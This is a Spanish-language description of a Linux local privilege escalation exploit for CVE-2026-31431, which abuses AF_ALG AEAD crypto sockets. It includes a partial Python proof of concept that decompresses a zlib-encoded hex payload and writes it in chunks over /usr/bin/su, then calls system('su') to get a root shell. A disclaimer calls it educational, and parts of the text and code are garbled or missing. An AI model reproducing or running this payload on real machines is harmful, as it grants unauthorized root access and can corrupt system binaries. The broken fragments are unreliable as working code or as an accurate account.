
Exploit de escalada de privilegios locales para CVE-2026-31431, que abusa del manejo de sockets AF_ALG AEAD para lograr acceso a una shell root en kernels de Linux vulnerables.
CVE-2026-31431 es una vulnerabilidad de escalada de privilegios en Linux que abusa de la interfaz AF_ALG (API criptográfica del kernel). Al elaborar una interacción maliciosa con sockets AEAD (Cifrado Autenticado con Datos Asociados), un atacante puede escalar privilegios y ejecutar código como root.
Esta vulnerabilidad aprovecha el manejo inadecuado de las operaciones de sockets criptográficos, lo que permite la manipulación controlada de la memoria y, finalmente, la escalada de privilegios.
/usr/bin/su)El exploit:
Crea un socket AF_ALG
Se vincula a:
authenc(hmac(sha256),cbc(aes))
Utiliza payloads manipulados mediante setsockopt y sendmsg
Desencadena un comportamiento no deseado del kernel
Accede a una shell root mediante:
g.system("su")
Indicadores clave:
socket(38,5,0) → AF_ALGzlib)
**Descargo de responsabilidad: No soy el autor de este PoC. Es solo con fines educativos para pruebas en entornos donde se disponga del permiso. El autor/propietario no será responsable de ningún uso indebido. **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")